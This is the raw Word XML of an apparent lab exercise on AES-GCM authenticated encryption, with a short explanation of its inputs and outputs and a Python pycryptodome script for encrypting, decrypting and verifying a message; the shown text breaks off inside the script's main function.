                <v:shape id="Graphic 133" o:spid="_x0000_s1030" style="position:absolute;left:61704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DOwQAAANwAAAAPAAAAZHJzL2Rvd25yZXYueG1sRE/fa8Iw&#10;EH4X9j+EG/giM3WCjM60jMlgD6WgHXs+mltTbC4lybT+90YQfLuP7+dty8kO4kQ+9I4VrJYZCOLW&#10;6Z47BT/N18sbiBCRNQ6OScGFApTF02yLuXZn3tPpEDuRQjjkqMDEOOZShtaQxbB0I3Hi/py3GBP0&#10;ndQezyncDvI1yzbSYs+pweBIn4ba4+HfKlhwXdWmb4521/w2ma9CPchKqfnz9PEOItIUH+K7+1un&#10;+es13J5JF8jiCgAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAAAAAA&#10;AAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsAAAAA&#10;AAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAMQYYM7BAAAA3AAAAA8AAAAA&#10;AAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD1AgAAAAA=&#10;" path="m3047,l,,,13716r3047,l3047,xe" fillcolor="#e2e2e2" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Graphic 134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6tWwQAAANwAAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9Li8Iw&#10;EL4v+B/CCN7W1CdL1ygqCKKn7XrZ22wzttVmUpJo6783wsLe5uN7zmLVmVrcyfnKsoLRMAFBnFtd&#10;caHg9L17/wDhA7LG2jIpeJCH1bL3tsBU25a/6J6FQsQQ9ikqKENoUil9XpJBP7QNceTO1hkMEbpC&#10;aodtDDe1HCfJXBqsODaU2NC2pPya3YwCsjlmSXs4/trL7vpzyWZuo2dKDfrd+hNEoC78i//cex3n&#10;T6bweiZeIJdPAAAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAAAAAA&#10;AAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsAAAAA&#10;AAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAJSfq1bBAAAA3AAAAA8AAAAA&#10;AAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD1AgAAAAA=&#10;" path="m3047,l,,,3047r3047,l3047,xe" fillcolor="#9f9f9f" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Graphic 135" o:spid="_x0000_s1032" style="position:absolute;left:3;top:174;width:61734;height:31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HhxgAAANwAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Ba8JA&#10;EIXvBf/DMoIXaTZVqxJdRRSh0Iu1Fj0O2TEJzc4u2TXGf98tFHqb4b33zZvlujO1aKnxlWUFL0kK&#10;gji3uuJCwelz/zwH4QOyxtoyKXiQh/Wq97TETNs7f1B7DIWIEPYZKihDcJmUPi/JoE+sI47a1TYG&#10;Q1ybQuoG7xFuajlK06k0WHG8UKKjbUn59/FmImXqtpUZfbnb6TA5nB/79+HuMlNq0O82CxCBuvBv&#10;/ku/6Vh//Aq/z8QJ5OoHAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAA&#10;AAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAA&#10;CwAAAAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEA3oQh4cYAAADcAAAA&#10;DwAAAAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPoCAAAAAA==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CEBCA0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16270238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Experiment</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria"/>
          <w:b/>
          <w:color w:val="4F81BC"/>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria"/>
          <w:b/>
          <w:color w:val="4F81BC"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="718CEBBE" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="23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8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria"/>
          <w:b/>
          <w:i/>
          <w:color w:val="4F81BC"/>
        </w:rPr>
        <w:t>1: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Understanding</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria"/>
          <w:b/>
          <w:i/>
          <w:color w:val="4F81BC"/>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria"/>
          <w:b/>
          <w:i/>
          <w:color w:val="4F81BC"/>
        </w:rPr>
        <w:t>AES-GCM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(Authenticated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  <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Encryption)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="463CD5B7" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="52"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26DFAF1D" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>AES-GCM (Galois/Counter Mode) is an authenticated encryption mode that provides both confidentiality</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>(encryption)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integrity/authentication</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>(message</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6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code -</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>MAC).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2"/>
        </w:rPr>
        <w:t>combines:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E4DB902" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="10"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36BF7AE3" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20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  <w:b/>
        </w:rPr>
        <w:t>Encryption</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri"/>
        </w:rPr>
        <w:t>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encrypt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plaintext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message.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ADA255D" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1078"/>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:ind w:right="1022"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri"/>
          <w:b/>
        </w:rPr>
        <w:t>Authentication</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri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(Galois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MAC)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authenticity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2"/>
        </w:rPr>
        <w:t>message.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD844E4" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="6"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CD7AC13" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>AES-GCM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>requires:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78F15F84" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="9"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5EEA4CA7" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:spacing w:before="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
        </w:rPr>
        <w:t>Key</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t>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secret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encryption.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D8B8CB1" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:ind w:right="670"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
        </w:rPr>
        <w:t>Nonce/IV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(Initialization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Vector)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t>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unique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encryption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operation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ensure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same plaintext produces different ciphertext each time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DA13CF7" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20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  <w:b/>
        </w:rPr>
        <w:t>Additional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Authenticated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(AAD)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Optional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authenticated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encrypted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DACA154" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20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  <w:b/>
        </w:rPr>
        <w:t>Ciphertext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encrypted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message.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B5E5F0" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20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  <w:b/>
        </w:rPr>
        <w:t>Tag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tag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verify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integrity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ciphertext.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3742FA89" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="16"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F922526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13"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria"/>
          <w:b/>
          <w:i/>
          <w:color w:val="4F81BC"/>
        </w:rPr>
        <w:t>2:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria"/>
          <w:b/>
          <w:i/>
          <w:color w:val="4F81BC"/>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria"/>
          <w:b/>
          <w:i/>
          <w:color w:val="4F81BC"/>
        </w:rPr>
        <w:t>Installing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria"/>
          <w:b/>
          <w:i/>
          <w:color w:val="4F81BC"/>
          <w:spacing w:val="-7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8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:b/>
          <w:i/>
          <w:color w:val="4F81BC"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>pycryptodome</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:b/>
          <w:i/>
          <w:color w:val="4F81BC"/>
          <w:spacing w:val="-71"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria"/>
          <w:b/>
          <w:i/>
          <w:color w:val="4F81BC"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Library</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A7F24E" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="71"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A076975" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1" w:line="230" w:lineRule="auto"/>
        <w:ind w:left="360" w:right="783"/>
      </w:pPr>
      <w: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pycryptodome</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-57"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>library,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AES</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5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 xml:space="preserve">cryptographic </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>operations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0965A684" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="19"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BB1D6EB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pycryptodome</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="108EBB5B" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="195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3: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Writing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Python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Script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</w:rPr>
        <w:t>for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</w:rPr>
        <w:t>AES-GCM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Encryption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and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Authentication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB65E8F" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="54"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45567F3F" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>We</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>will 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Python script </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t>to:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="225C71ED" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="7"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F8B4300" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1078"/>
        </w:tabs>
        <w:spacing w:before="1"/>
        <w:ind w:left="1078" w:hanging="358"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri"/>
        </w:rPr>
        <w:t>Encrypt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AES-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri"/>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>GCM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C962FCB" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19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Authenticate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authentication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tag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B43B97" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri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5ED636" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="324CC4F6" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="9"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="462CE80F" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1078"/>
        </w:tabs>
        <w:ind w:left="1078" w:hanging="358"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri"/>
        </w:rPr>
        <w:t>Decrypt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authenticity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43CF675C" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="12"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06BCFB15" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="1"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria"/>
          <w:color w:val="233E5F"/>
        </w:rPr>
        <w:t>Python</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria"/>
          <w:color w:val="233E5F"/>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria"/>
          <w:color w:val="233E5F"/>
        </w:rPr>
        <w:t>Code</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria"/>
          <w:color w:val="233E5F"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> (aes_gcm_encryption.py):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AF9131F" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="43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Crypto.Cipher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AES</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="605F5278" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="360" w:right="4861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Crypto.Random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get_random_bytes from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Crypto.Util.Padding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pad,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unpad from Crypto.Protocol.KDF import scrypt import base64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43EBA700" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="427289EF" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="360" w:right="18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(AES-256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requires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32-byte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key) def generate_key():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F2274FC" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="1"/>
        <w:ind w:left="840" w:right="3449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get_random_bytes(32)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AES-256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size return key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27EEB540" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="226"/>
        <w:ind w:left="360" w:right="45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AES-GCM def encrypt_message(key, message, aad=None):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BAC1997" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="1"/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12-byte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nonce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(recommended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size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GCM) nonce = get_random_bytes(12)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="645E7851" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="226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object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="173A99B0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AES.new(key,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AES.MODE_GCM,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nonce=nonce)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E26BBBF" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6EFD5AD0" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="1"/>
        <w:ind w:left="840" w:right="783"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t># Encrypt the message and return ciphertext, nonce, and tag cipher.update(aad)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Optional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AAD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(Additional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Authenticated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Data) ciphertext, tag = cipher.encrypt_and_digest(message.encode())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0891C1E5" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="225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ciphertext,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nonce,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5"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>tag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AC82A0F" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C02604F" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="1"/>
        <w:ind w:left="360" w:right="1143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its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authenticity def decrypt_message(key, ciphertext, nonce, tag, aad=None):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12358EE5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object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB792A7" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:ind w:left="840" w:right="1678"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>cipher = AES.new(key, AES.MODE_GCM, nonce=nonce) cipher.update(aad)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Optional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AAD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(Additional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Authenticated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Data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C81D1A2" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="1"/>
        <w:ind w:left="840" w:right="3449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authenticity </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B53F9D5" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="1320" w:right="1143"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>decrypted_message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cipher.decrypt_and_verify(ciphertext,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tag) return decrypted_message.decode()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA4533F" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:line="225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(ValueError,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TypeError):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E1A5CD3" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="2"/>
        <w:ind w:left="1320" w:right="2701"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>print("Decryption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tampered!") return None</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7467C252" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="226"/>
        <w:ind w:left="360" w:right="222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demonstrate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encryption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decryption def main():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B96C26B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encrypted</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71AD5BCF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message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"This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confidential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authenticated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message."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A80558" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22E1BF3C" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="840" w:right="6855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AES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key key = generate_key()</w:t>
      </w:r>
    </w:p>
